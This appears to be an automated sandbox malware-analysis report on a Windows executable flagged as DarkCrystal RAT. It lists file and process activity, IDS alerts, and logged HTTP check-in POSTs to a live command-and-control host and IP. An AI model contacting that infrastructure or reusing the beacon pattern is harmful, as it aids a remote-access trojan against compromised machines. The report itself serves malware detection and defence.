                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BCC220
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49762 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49801 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49844 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49872 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49781 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49823 -> 37.44.238.250:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 595506cm.n9shka.topContent-Length: 328Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 595506cm.n9shka.top
                                    Source: unknownHTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.00000000037F4000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000342E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.00000000039E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://595506cm.n9shka.top
                                    Source: lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://595506cm.n9shka.top/
                                    Source: lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                    Source: lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://595506cm.n9shka.topP
                                    Source: ComponentBrowserruntimeHostNet.exe, 00000004.00000002.1759739963.000000000388F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00BB6FAA
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB848E0_2_00BB848E
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC00B70_2_00BC00B7
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC40880_2_00BC4088
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB40FE0_2_00BB40FE
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BD51C90_2_00BD51C9
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC71530_2_00BC7153
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB32F70_2_00BB32F7
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC62CA0_2_00BC62CA
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC43BF0_2_00BC43BF
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBC4260_2_00BBC426
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBF4610_2_00BBF461
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BDD4400_2_00BDD440
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC77EF0_2_00BC77EF
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BDD8EE0_2_00BDD8EE
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB286B0_2_00BB286B
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBE9B70_2_00BBE9B7
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BE19F40_2_00BE19F4
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC6CDC0_2_00BC6CDC
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BC3E0B0_2_00BC3E0B
